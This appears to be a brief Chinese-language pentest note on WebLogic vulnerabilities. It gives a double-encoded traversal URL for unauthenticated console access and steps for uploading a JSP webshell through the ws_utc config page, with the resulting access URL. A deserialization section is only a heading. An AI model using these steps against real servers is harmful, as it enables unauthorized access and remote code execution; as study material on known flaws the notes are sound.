weblogic常见漏洞
前言
weblogic的管理端口是:7001
tomcat端口:8080
jboss端口:8080
端口可以改
一、未授权登录
进入登录界面:http://192.168.18.45:7001/console/login/LoginForm.jsp
未授权访问漏洞:http://192.168.18.45:7001/console/css/%252e%252e%252fconsole.portal,通过这段代码不用登录就可以直接访问,
二、任意文件上传漏洞操作
文字叙述步骤:
未授权访问路径:http://192.168.18.45:7001/ws_utc/config.do
Weblogic默认路径:
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\tmp\WSTestPageWorkDir
我们改成以下路径
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\wstestclient\i7n5e1\war\css
木马上传上去之后,访问方式如下:
http://192.168.0.127:7001/ws_utc/css/config/keystore/1604376329959_whoami.jsp
1604376329959_whoami.jsp
具体操作
三、反序列化